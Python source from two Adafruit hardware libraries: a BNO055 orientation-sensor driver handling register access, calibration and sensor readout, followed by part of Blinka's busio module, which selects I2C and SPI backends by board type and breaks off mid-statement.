BNO055_PWR_MODE_ADDR = 0X3E
BNO055_SYS_TRIGGER_ADDR = 0X3F
BNO055_TEMP_SOURCE_ADDR = 0X40
# Axis remap registers
BNO055_AXIS_MAP_CONFIG_ADDR = 0X41
BNO055_AXIS_MAP_SIGN_ADDR = 0X42
# Axis remap values
AXIS_REMAP_X = 0x00
AXIS_REMAP_Y = 0x01
AXIS_REMAP_Z = 0x02
AXIS_REMAP_POSITIVE = 0x00
AXIS_REMAP_NEGATIVE = 0x01
# SIC registers
BNO055_SIC_MATRIX_0_LSB_ADDR = 0X43
BNO055_SIC_MATRIX_0_MSB_ADDR = 0X44
BNO055_SIC_MATRIX_1_LSB_ADDR = 0X45
BNO055_SIC_MATRIX_1_MSB_ADDR = 0X46
BNO055_SIC_MATRIX_2_LSB_ADDR = 0X47
BNO055_SIC_MATRIX_2_MSB_ADDR = 0X48
BNO055_SIC_MATRIX_3_LSB_ADDR = 0X49
BNO055_SIC_MATRIX_3_MSB_ADDR = 0X4A
BNO055_SIC_MATRIX_4_LSB_ADDR = 0X4B
BNO055_SIC_MATRIX_4_MSB_ADDR = 0X4C
BNO055_SIC_MATRIX_5_LSB_ADDR = 0X4D
BNO055_SIC_MATRIX_5_MSB_ADDR = 0X4E
BNO055_SIC_MATRIX_6_LSB_ADDR = 0X4F
BNO055_SIC_MATRIX_6_MSB_ADDR = 0X50
BNO055_SIC_MATRIX_7_LSB_ADDR = 0X51
BNO055_SIC_MATRIX_7_MSB_ADDR = 0X52
BNO055_SIC_MATRIX_8_LSB_ADDR = 0X53
BNO055_SIC_MATRIX_8_MSB_ADDR = 0X54
# Accelerometer Offset registers
ACCEL_OFFSET_X_LSB_ADDR = 0X55
ACCEL_OFFSET_X_MSB_ADDR = 0X56
ACCEL_OFFSET_Y_LSB_ADDR = 0X57
ACCEL_OFFSET_Y_MSB_ADDR = 0X58
ACCEL_OFFSET_Z_LSB_ADDR = 0X59
ACCEL_OFFSET_Z_MSB_ADDR = 0X5A
# Magnetometer Offset registers
MAG_OFFSET_X_LSB_ADDR = 0X5B
MAG_OFFSET_X_MSB_ADDR = 0X5C
MAG_OFFSET_Y_LSB_ADDR = 0X5D
MAG_OFFSET_Y_MSB_ADDR = 0X5E
MAG_OFFSET_Z_LSB_ADDR = 0X5F
MAG_OFFSET_Z_MSB_ADDR = 0X60
# Gyroscope Offset register s
GYRO_OFFSET_X_LSB_ADDR = 0X61
GYRO_OFFSET_X_MSB_ADDR = 0X62
GYRO_OFFSET_Y_LSB_ADDR = 0X63
GYRO_OFFSET_Y_MSB_ADDR = 0X64
GYRO_OFFSET_Z_LSB_ADDR = 0X65
GYRO_OFFSET_Z_MSB_ADDR = 0X66
# Radius registers
ACCEL_RADIUS_LSB_ADDR = 0X67
ACCEL_RADIUS_MSB_ADDR = 0X68
MAG_RADIUS_LSB_ADDR = 0X69
MAG_RADIUS_MSB_ADDR = 0X6A
# Power modes
POWER_MODE_NORMAL = 0X00
POWER_MODE_LOWPOWER = 0X01
POWER_MODE_SUSPEND = 0X02
# Operation mode settings
OPERATION_MODE_CONFIG = 0X00
OPERATION_MODE_ACCONLY = 0X01
OPERATION_MODE_MAGONLY = 0X02
OPERATION_MODE_GYRONLY = 0X03
OPERATION_MODE_ACCMAG = 0X04
OPERATION_MODE_ACCGYRO = 0X05
OPERATION_MODE_MAGGYRO = 0X06
OPERATION_MODE_AMG = 0X07
OPERATION_MODE_IMUPLUS = 0X08
OPERATION_MODE_COMPASS = 0X09
OPERATION_MODE_M4G = 0X0A
OPERATION_MODE_NDOF_FMC_OFF = 0X0B
OPERATION_MODE_NDOF = 0X0C
logger = logging.getLogger(__name__)
class BNO055(object):
def __init__(self, rst=None, address=BNO055_ADDRESS_A, i2c=None, gpio=None,
serial_port=None, serial_timeout_sec=5, **kwargs):
# If reset pin is provided save it and a reference to provided GPIO
# bus (or the default system GPIO bus if none is provided).
self._rst = rst
if self._rst is not None:
if gpio is None:
import Adafruit_GPIO as GPIO
gpio = GPIO.get_platform_gpio()
self._gpio = gpio
# Setup the reset pin as an output at a high level.
self._gpio.setup(self._rst, GPIO.OUT)
self._gpio.set_high(self._rst)
# Wait a 650 milliseconds in case setting the reset high reset the chip.
time.sleep(0.65)
self._serial = None
self._i2c_device = None
if serial_port is not None:
# Use serial communication if serial_port name is provided.
# Open the serial port at 115200 baud, 8N1. Add a 5 second timeout
# to prevent hanging if device is disconnected.
self._serial = serial.Serial(serial_port, 115200, timeout=serial_timeout_sec,
writeTimeout=serial_timeout_sec)
else:
# Use I2C if no serial port is provided.
# Assume we're using platform's default I2C bus if none is specified.
if i2c is None:
import Adafruit_GPIO.I2C as I2C
i2c = I2C
# Save a reference to the I2C device instance for later communication.
self._i2c_device = i2c.get_i2c_device(address, **kwargs)
def _serial_send(self, command, ack=True, max_attempts=5):
# Send a serial command and automatically handle if it needs to be resent
# because of a bus error. If ack is True then an ackowledgement is
# expected and only up to the maximum specified attempts will be made
# to get a good acknowledgement (default is 5). If ack is False then
# no acknowledgement is expected (like when resetting the device).
attempts = 0
while True:
# Flush any pending received data to get into a clean state.
self._serial.flushInput()
# Send the data.
self._serial.write(command)
logger.debug('Serial send: 0x{0}'.format(binascii.hexlify(command)))
# Stop if no acknowledgment is expected.
if not ack:
return
# Read acknowledgement response (2 bytes).
resp = bytearray(self._serial.read(2))
logger.debug('Serial receive: 0x{0}'.format(binascii.hexlify(resp)))
if resp is None or len(resp) != 2:
raise RuntimeError('Timeout waiting for serial acknowledge, is the BNO055 connected?')
# Stop if there's no bus error (0xEE07 response) and return response bytes.
if not (resp[0] == 0xEE and resp[1] == 0x07):
return resp
# Else there was a bus error so resend, as recommended in UART app
# note at:
# http://ae-bst.resource.bosch.com/media/products/dokumente/bno055/BST-BNO055-AN012-00.pdf
attempts += 1
if attempts >= max_attempts:
raise RuntimeError('Exceeded maximum attempts to acknowledge serial command without bus error!')
def _write_bytes(self, address, data, ack=True):
# Write a list of 8-bit values starting at the provided register address.
if self._i2c_device is not None:
# I2C write.
self._i2c_device.writeList(address, data)
else:
# Build and send serial register write command.
command = bytearray(4+len(data))
command[0] = 0xAA # Start byte
command[1] = 0x00 # Write
command[2] = address & 0xFF
command[3] = len(data) & 0xFF
command[4:] = map(lambda x: x & 0xFF, data)
resp = self._serial_send(command, ack=ack)
# Verify register write succeeded if there was an acknowledgement.
if resp[0] != 0xEE and resp[1] != 0x01:
raise RuntimeError('Register write error: 0x{0}'.format(binascii.hexlify(resp)))
def _write_byte(self, address, value, ack=True):
# Write an 8-bit value to the provided register address. If ack is True
# then expect an acknowledgement in serial mode, otherwise ignore any
# acknowledgement (necessary when resetting the device).
if self._i2c_device is not None:
# I2C write.
self._i2c_device.write8(address, value)
else:
# Build and send serial register write command.
command = bytearray(5)
command[0] = 0xAA # Start byte
command[1] = 0x00 # Write
command[2] = address & 0xFF
command[3] = 1 # Length (1 byte)
command[4] = value & 0xFF
resp = self._serial_send(command, ack=ack)
# Verify register write succeeded if there was an acknowledgement.
if ack and resp[0] != 0xEE and resp[1] != 0x01:
raise RuntimeError('Register write error: 0x{0}'.format(binascii.hexlify(resp)))
def _read_bytes(self, address, length):
# Read a number of unsigned byte values starting from the provided address.
if self._i2c_device is not None:
# I2C read.
return bytearray(self._i2c_device.readList(address, length))
else:
# Build and send serial register read command.
command = bytearray(4)
command[0] = 0xAA # Start byte
command[1] = 0x01 # Read
command[2] = address & 0xFF
command[3] = length & 0xFF
resp = self._serial_send(command)
# Verify register read succeeded.
if resp[0] != 0xBB:
raise RuntimeError('Register read error: 0x{0}'.format(binascii.hexlify(resp)))
# Read the returned bytes.
length = resp[1]
resp = bytearray(self._serial.read(length))
logger.debug('Received: 0x{0}'.format(binascii.hexlify(resp)))
if resp is None or len(resp) != length:
raise RuntimeError('Timeout waiting to read data, is the BNO055 connected?')
return resp
def _read_byte(self, address):
# Read an 8-bit unsigned value from the provided register address.
if self._i2c_device is not None:
# I2C read.
return self._i2c_device.readU8(address)
else:
return self._read_bytes(address, 1)[0]
def _read_signed_byte(self, address):
# Read an 8-bit signed value from the provided register address.
data = self._read_byte(address)
if data > 127:
return data - 256
else:
return data
def _config_mode(self):
# Enter configuration mode.
self.set_mode(OPERATION_MODE_CONFIG)
def _operation_mode(self):
# Enter operation mode to read sensor data.
self.set_mode(self._mode)
def begin(self, mode=OPERATION_MODE_NDOF):
"""Initialize the BNO055 sensor. Must be called once before any other
BNO055 library functions. Will return True if the BNO055 was
successfully initialized, and False otherwise.
"""
# Save the desired normal operation mode.
self._mode = mode
# First send a thow-away command and ignore any response or I2C errors
# just to make sure the BNO is in a good state and ready to accept
# commands (this seems to be necessary after a hard power down).
try:
self._write_byte(BNO055_PAGE_ID_ADDR, 0, ack=False)
except IOError:
# Swallow an IOError that might be raised by an I2C issue. Only do
# this for this very first command to help get the BNO and board's
# I2C into a clear state ready to accept the next commands.
pass
# Make sure we're in config mode and on page 0.
self._config_mode()
self._write_byte(BNO055_PAGE_ID_ADDR, 0)
# Check the chip ID
bno_id = self._read_byte(BNO055_CHIP_ID_ADDR)
logger.debug('Read chip ID: 0x{0:02X}'.format(bno_id))
if bno_id != BNO055_ID:
return False
# Reset the device.
if self._rst is not None:
# Use the hardware reset pin if provided.
# Go low for a short period, then high to signal a reset.
self._gpio.set_low(self._rst)
time.sleep(0.01) # 10ms
self._gpio.set_high(self._rst)
else:
# Else use the reset command. Note that ack=False is sent because
# the chip doesn't seem to ack a reset in serial mode (by design?).
self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x20, ack=False)
# Wait 650ms after reset for chip to be ready (as suggested
# in datasheet).
time.sleep(0.65)
# Set to normal power mode.
self._write_byte(BNO055_PWR_MODE_ADDR, POWER_MODE_NORMAL)
# Default to internal oscillator.
self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x0)
# Enter normal operation mode.
self._operation_mode()
return True
def set_mode(self, mode):
"""Set operation mode for BNO055 sensor. Mode should be a value from
table 3-3 and 3-5 of the datasheet:
http://www.adafruit.com/datasheets/BST_BNO055_DS000_12.pdf
"""
self._write_byte(BNO055_OPR_MODE_ADDR, mode & 0xFF)
# Delay for 30 milliseconds (datsheet recommends 19ms, but a little more
# can't hurt and the kernel is going to spend some unknown amount of time
# too).
time.sleep(0.03)
def get_revision(self):
"""Return a tuple with revision information about the BNO055 chip. Will
return 5 values:
- Software revision
- Bootloader version
- Accelerometer ID
- Magnetometer ID
- Gyro ID
"""
# Read revision values.
accel = self._read_byte(BNO055_ACCEL_REV_ID_ADDR)
mag = self._read_byte(BNO055_MAG_REV_ID_ADDR)
gyro = self._read_byte(BNO055_GYRO_REV_ID_ADDR)
bl = self._read_byte(BNO055_BL_REV_ID_ADDR)
sw_lsb = self._read_byte(BNO055_SW_REV_ID_LSB_ADDR)
sw_msb = self._read_byte(BNO055_SW_REV_ID_MSB_ADDR)
sw = ((sw_msb << 8) | sw_lsb) & 0xFFFF
# Return the results as a tuple of all 5 values.
return (sw, bl, accel, mag, gyro)
def set_external_crystal(self, external_crystal):
"""Set if an external crystal is being used by passing True, otherwise
use the internal oscillator by passing False (the default behavior).
"""
# Switch to configuration mode.
self._config_mode()
# Set the clock bit appropriately in the SYS_TRIGGER register.
if external_crystal:
self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x80)
else:
self._write_byte(BNO055_SYS_TRIGGER_ADDR, 0x00)
# Go back to normal operation mode.
self._operation_mode()
def get_system_status(self, run_self_test=True):
"""Return a tuple with status information. Three values will be returned:
- System status register value with the following meaning:
0 = Idle
1 = System Error
2 = Initializing Peripherals
3 = System Initialization
4 = Executing Self-Test
5 = Sensor fusion algorithm running
6 = System running without fusion algorithms
- Self test result register value with the following meaning:
Bit value: 1 = test passed, 0 = test failed
Bit 0 = Accelerometer self test
Bit 1 = Magnetometer self test
Bit 2 = Gyroscope self test
Bit 3 = MCU self test
Value of 0x0F = all good!
- System error register value with the following meaning:
0 = No error
1 = Peripheral initialization error
2 = System initialization error
3 = Self test result failed
4 = Register map value out of range
5 = Register map address out of range
6 = Register map write error
7 = BNO low power mode not available for selected operation mode
8 = Accelerometer power mode not available
9 = Fusion algorithm configuration error
10 = Sensor configuration error
If run_self_test is passed in as False then no self test is performed and
None will be returned for the self test result. Note that running a
self test requires going into config mode which will stop the fusion
engine from running.
"""
self_test = None
if run_self_test:
# Switch to configuration mode if running self test.
self._config_mode()
# Perform a self test.
sys_trigger = self._read_byte(BNO055_SYS_TRIGGER_ADDR)
self._write_byte(BNO055_SYS_TRIGGER_ADDR, sys_trigger | 0x1)
# Wait for self test to finish.
time.sleep(1.0)
# Read test result.
self_test = self._read_byte(BNO055_SELFTEST_RESULT_ADDR)
# Go back to operation mode.
self._operation_mode()
# Now read status and error registers.
status = self._read_byte(BNO055_SYS_STAT_ADDR)
error = self._read_byte(BNO055_SYS_ERR_ADDR)
# Return the results as a tuple of all 3 values.
return (status, self_test, error)
def get_calibration_status(self):
"""Read the calibration status of the sensors and return a 4 tuple with
calibration status as follows:
- System, 3=fully calibrated, 0=not calibrated
- Gyroscope, 3=fully calibrated, 0=not calibrated
- Accelerometer, 3=fully calibrated, 0=not calibrated
- Magnetometer, 3=fully calibrated, 0=not calibrated
"""
# Return the calibration status register value.
cal_status = self._read_byte(BNO055_CALIB_STAT_ADDR)
sys = (cal_status >> 6) & 0x03
gyro = (cal_status >> 4) & 0x03
accel = (cal_status >> 2) & 0x03
mag = cal_status & 0x03
# Return the results as a tuple of all 3 values.
return (sys, gyro, accel, mag)
def get_calibration(self):
"""Return the sensor's calibration data and return it as an array of
22 bytes. Can be saved and then reloaded with the set_calibration function
to quickly calibrate from a previously calculated set of calibration data.
"""
# Switch to configuration mode, as mentioned in section 3.10.4 of datasheet.
self._config_mode()
# Read the 22 bytes of calibration data and convert it to a list (from
# a bytearray) so it's more easily serialized should the caller want to
# store it.
cal_data = list(self._read_bytes(ACCEL_OFFSET_X_LSB_ADDR, 22))
# Go back to normal operation mode.
self._operation_mode()
return cal_data
def set_calibration(self, data):
"""Set the sensor's calibration data using a list of 22 bytes that
represent the sensor offsets and calibration data. This data should be
a value that was previously retrieved with get_calibration (and then
perhaps persisted to disk or other location until needed again).
"""
# Check that 22 bytes were passed in with calibration data.
if data is None or len(data) != 22:
raise ValueError('Expected a list of 22 bytes for calibration data.')
# Switch to configuration mode, as mentioned in section 3.10.4 of datasheet.
self._config_mode()
# Set the 22 bytes of calibration data.
self._write_bytes(ACCEL_OFFSET_X_LSB_ADDR, data)
# Go back to normal operation mode.
self._operation_mode()
def get_axis_remap(self):
"""Return a tuple with the axis remap register values. This will return
6 values with the following meaning:
- X axis remap (a value of AXIS_REMAP_X, AXIS_REMAP_Y, or AXIS_REMAP_Z.
which indicates that the physical X axis of the chip
is remapped to a different axis)
- Y axis remap (see above)
- Z axis remap (see above)
- X axis sign (a value of AXIS_REMAP_POSITIVE or AXIS_REMAP_NEGATIVE
which indicates if the X axis values should be positive/
normal or negative/inverted. The default is positive.)
- Y axis sign (see above)
- Z axis sign (see above)
Note that by default the axis orientation of the BNO chip looks like
the following (taken from section 3.4, page 24 of the datasheet). Notice
the dot in the corner that corresponds to the dot on the BNO chip:
| Z axis
|
| / X axis
____|__/____
Y axis / * | / /|
_________ /______|/ //
/___________ //
|____________|/
"""
# Get the axis remap register value.
map_config = self._read_byte(BNO055_AXIS_MAP_CONFIG_ADDR)
z = (map_config >> 4) & 0x03
y = (map_config >> 2) & 0x03
x = map_config & 0x03
# Get the axis remap sign register value.
sign_config = self._read_byte(BNO055_AXIS_MAP_SIGN_ADDR)
x_sign = (sign_config >> 2) & 0x01
y_sign = (sign_config >> 1) & 0x01
z_sign = sign_config & 0x01
# Return the results as a tuple of all 3 values.
return (x, y, z, x_sign, y_sign, z_sign)
def set_axis_remap(self, x, y, z,
x_sign=AXIS_REMAP_POSITIVE, y_sign=AXIS_REMAP_POSITIVE,
z_sign=AXIS_REMAP_POSITIVE):
"""Set axis remap for each axis. The x, y, z parameter values should
be set to one of AXIS_REMAP_X, AXIS_REMAP_Y, or AXIS_REMAP_Z and will
change the BNO's axis to represent another axis. Note that two axises
cannot be mapped to the same axis, so the x, y, z params should be a
unique combination of AXIS_REMAP_X, AXIS_REMAP_Y, AXIS_REMAP_Z values.
The x_sign, y_sign, z_sign values represent if the axis should be positive
or negative (inverted).
See the get_axis_remap documentation for information on the orientation
of the axises on the chip, and consult section 3.4 of the datasheet.
"""
# Switch to configuration mode.
self._config_mode()
# Set the axis remap register value.
map_config = 0x00
map_config |= (z & 0x03) << 4
map_config |= (y & 0x03) << 2
map_config |= x & 0x03
self._write_byte(BNO055_AXIS_MAP_CONFIG_ADDR, map_config)
# Set the axis remap sign register value.
sign_config = 0x00
sign_config |= (x_sign & 0x01) << 2
sign_config |= (y_sign & 0x01) << 1
sign_config |= z_sign & 0x01
self._write_byte(BNO055_AXIS_MAP_SIGN_ADDR, sign_config)
# Go back to normal operation mode.
self._operation_mode()
def _read_vector(self, address, count=3):
# Read count number of 16-bit signed values starting from the provided
# address. Returns a tuple of the values that were read.
data = self._read_bytes(address, count*2)
result = [0]*count
for i in range(count):
result[i] = ((data[i*2+1] << 8) | data[i*2]) & 0xFFFF
if result[i] > 32767:
result[i] -= 65536
return result
def read_euler(self):
"""Return the current absolute orientation as a tuple of heading, roll,
and pitch euler angles in degrees.
"""
heading, roll, pitch = self._read_vector(BNO055_EULER_H_LSB_ADDR)
return (heading/16.0, roll/16.0, pitch/16.0)
def read_magnetometer(self):
"""Return the current magnetometer reading as a tuple of X, Y, Z values
in micro-Teslas.
"""
x, y, z = self._read_vector(BNO055_MAG_DATA_X_LSB_ADDR)
return (x/16.0, y/16.0, z/16.0)
def read_gyroscope(self):
"""Return the current gyroscope (angular velocity) reading as a tuple of
X, Y, Z values in degrees per second.
"""
x, y, z = self._read_vector(BNO055_GYRO_DATA_X_LSB_ADDR)
return (x/900.0, y/900.0, z/900.0)
def read_accelerometer(self):
"""Return the current accelerometer reading as a tuple of X, Y, Z values
in meters/second^2.
"""
x, y, z = self._read_vector(BNO055_ACCEL_DATA_X_LSB_ADDR)
return (x/100.0, y/100.0, z/100.0)
def read_linear_acceleration(self):
"""Return the current linear acceleration (acceleration from movement,
not from gravity) reading as a tuple of X, Y, Z values in meters/second^2.
"""
x, y, z = self._read_vector(BNO055_LINEAR_ACCEL_DATA_X_LSB_ADDR)
return (x/100.0, y/100.0, z/100.0)
def read_gravity(self):
"""Return the current gravity acceleration reading as a tuple of X, Y, Z
values in meters/second^2.
"""
x, y, z = self._read_vector(BNO055_GRAVITY_DATA_X_LSB_ADDR)
return (x/100.0, y/100.0, z/100.0)
def read_quaternion(self):
"""Return the current orientation as a tuple of X, Y, Z, W quaternion
values.
"""
w, x, y, z = self._read_vector(BNO055_QUATERNION_DATA_W_LSB_ADDR, 4)
# Scale values, see 3.6.5.5 in the datasheet.
scale = (1.0 / (1<<14))
return (x*scale, y*scale, z*scale, w*scale)
def read_temp(self):
"""Return the current temperature in Celsius."""
return self._read_signed_byte(BNO055_TEMP_ADDR) | Adafruit-BNO055 | /Adafruit_BNO055-1.0.2.tar.gz/Adafruit_BNO055-1.0.2/Adafruit_BNO055/BNO055.py | BNO055.py |
try:
import threading
except ImportError:
threading = None
# pylint: disable=unused-import
import adafruit_platformdetect.constants.boards as ap_board
import adafruit_platformdetect.constants.chips as ap_chip
from adafruit_blinka import Enum, Lockable, agnostic
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=import-outside-toplevel,too-many-branches,too-many-statements
# pylint: disable=too-many-arguments,too-many-function-args,too-many-return-statements
class I2C(Lockable):
"""
Busio I2C Class for CircuitPython Compatibility. Used
for both MicroPython and Linux.
"""
def __init__(self, scl, sda, frequency=100000):
self.init(scl, sda, frequency)
def init(self, scl, sda, frequency):
"""Initialization"""
self.deinit()
if detector.board.ftdi_ft232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.i2c import I2C as _I2C
self._i2c = _I2C(frequency=frequency)
return
if detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.i2c import I2C as _I2C
self._i2c = _I2C(frequency=frequency)
return
if detector.board.microchip_mcp2221:
from adafruit_blinka.microcontroller.mcp2221.i2c import I2C as _I2C
self._i2c = _I2C(frequency=frequency)
return
if detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.i2c import I2C as _I2C
self._i2c = _I2C(frequency=frequency)
return
if detector.board.pico_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import I2C_Pico as _I2C
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.feather_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_Feather as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.feather_can_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_Feather_CAN as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.feather_epd_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_Feather_EPD as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.feather_rfm_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_Feather_RFM as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.qtpy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import I2C_QTPY as _I2C
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.itsybitsy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_ItsyBitsy as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.macropad_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_MacroPad as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.qt2040_trinkey_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_QT2040_Trinkey as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.kb2040_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.i2c import (
I2C_KB2040 as _I2C,
)
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.chip.id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040.i2c import I2C as _I2C
self._i2c = _I2C(scl, sda, frequency=frequency)
return
if detector.board.any_siemens_iot2000:
from adafruit_blinka.microcontroller.am65xx.i2c import I2C as _I2C
self._i2c = _I2C(frequency=frequency)
return
if detector.board.any_embedded_linux:
from adafruit_blinka.microcontroller.generic_linux.i2c import I2C as _I2C
elif detector.board.ftdi_ft2232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.i2c import I2C as _I2C
else:
from adafruit_blinka.microcontroller.generic_micropython.i2c import (
I2C as _I2C,
)
from microcontroller.pin import i2cPorts
for portId, portScl, portSda in i2cPorts:
try:
# pylint: disable=unexpected-keyword-arg
if scl == portScl and sda == portSda:
self._i2c = _I2C(portId, mode=_I2C.MASTER, baudrate=frequency)
break
# pylint: enable=unexpected-keyword-arg
except RuntimeError:
pass
else:
raise ValueError(
"No Hardware I2C on (scl,sda)={}\nValid I2C ports: {}".format(
(scl, sda), i2cPorts
)
)
if threading is not None:
self._lock = threading.RLock()
def deinit(self):
"""Deinitialization"""
try:
del self._i2c
except AttributeError:
pass
def __enter__(self):
if threading is not None:
self._lock.acquire()
return self
def __exit__(self, exc_type, exc_value, traceback):
if threading is not None:
self._lock.release()
self.deinit()
def scan(self):
"""Scan for attached devices"""
return self._i2c.scan()
def readfrom_into(self, address, buffer, *, start=0, end=None):
"""Read from a device at specified address into a buffer"""
if start != 0 or end is not None:
if end is None:
end = len(buffer)
buffer = memoryview(buffer)[start:end]
stop = True # remove for efficiency later
return self._i2c.readfrom_into(address, buffer, stop=stop)
def writeto(self, address, buffer, *, start=0, end=None, stop=True):
"""Write to a device at specified address from a buffer"""
if isinstance(buffer, str):
buffer = bytes([ord(x) for x in buffer])
if start != 0 or end is not None:
if end is None:
return self._i2c.writeto(address, memoryview(buffer)[start:], stop=stop)
return self._i2c.writeto(address, memoryview(buffer)[start:end], stop=stop)
return self._i2c.writeto(address, buffer, stop=stop)
def writeto_then_readfrom(
self,
address,
buffer_out,
buffer_in,
*,
out_start=0,
out_end=None,
in_start=0,
in_end=None,
stop=False,
):
""" "Write to a device at specified address from a buffer then read
from a device at specified address into a buffer
"""
return self._i2c.writeto_then_readfrom(
address,
buffer_out,
buffer_in,
out_start=out_start,
out_end=out_end,
in_start=in_start,
in_end=in_end,
stop=stop,
)
class SPI(Lockable):
"""
Busio SPI Class for CircuitPython Compatibility. Used
for both MicroPython and Linux.
"""
def __init__(self, clock, MOSI=None, MISO=None):
self.deinit()
if detector.board.ftdi_ft232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import SPI as _SPI
from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import (
SCK,
MOSI,
MISO,
)
self._spi = _SPI()
self._pins = (SCK, MOSI, MISO)
return
if detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.spi import SPI as _SPI
from adafruit_blinka.microcontroller.nova.pin import SCK, MOSI, MISO
self._spi = _SPI(clock)
self._pins = (SCK, MOSI, MISO)
return
if detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.spi import SPI as _SPI
from adafruit_blinka.microcontroller.nxp_lpc4330.pin import SCK, MOSI, MISO
self._spi = _SPI()
self._pins = (SCK, MOSI, MISO)
return
if detector.board.pico_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_Pico as _SPI
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.feather_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.feather_can_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_CAN as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.feather_epd_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_EPD as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.feather_rfm_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_Feather_RFM as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.itsybitsy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_ItsyBitsy as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.macropad_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_MacroPad as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.qtpy_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import SPI_QTPY as _SPI
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.kb2040_u2if:
from adafruit_blinka.microcontroller.rp2040_u2if.spi import (
SPI_KB2040 as _SPI,
)
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.chip.id == ap_chip.RP2040:
from adafruit_blinka.microcontroller.rp2040.spi import SPI as _SPI
self._spi = _SPI(clock, MOSI, MISO) # Pins configured on instantiation
self._pins = (clock, clock, clock) # These don't matter, they're discarded
return
if detector.board.any_siemens_iot2000:
from adafruit_blinka.microcontroller.am65xx.spi import SPI as _SPI
self._spi = _SPI(clock) # this is really all that's needed
self._pins = (clock, clock, clock) # will determine MOSI/MISO from clock
return
if detector.board.any_embedded_linux:
from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
elif detector.board.ftdi_ft2232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import SPI as _SPI
else:
from adafruit_blinka.microcontroller.generic_micropython.spi import (
SPI as _SPI,
)
from microcontroller.pin import spiPorts
for portId, portSck, portMosi, portMiso in spiPorts:
if (
(clock == portSck)
and MOSI in (portMosi, None) # Clock is required!
and MISO in (portMiso, None) # But can do with just output
): # Or just input
self._spi = _SPI(portId)
self._pins = (portSck, portMosi, portMiso)
break
else:
raise ValueError(
"No Hardware SPI on (SCLK, MOSI, MISO)={}\nValid SPI ports:{}".format(
(clock, MOSI, MISO), spiPorts
)
)
def configure(self, baudrate=100000, polarity=0, phase=0, bits=8):
"""Update the configuration"""
if detector.board.any_nanopi and detector.chip.id == ap_chip.SUN8I:
from adafruit_blinka.microcontroller.generic_linux.spi import SPI as _SPI
elif detector.board.ftdi_ft232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import (
SPI as _SPI,
)
elif detector.board.ftdi_ft2232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.spi import (
SPI as _SPI,
)
elif detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.spi import SPI as _SPI
elif detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.spi import SPI as _SPI
elif detector.board.any_lubancat and detector.chip.id == ap_chip.IMX6ULL:
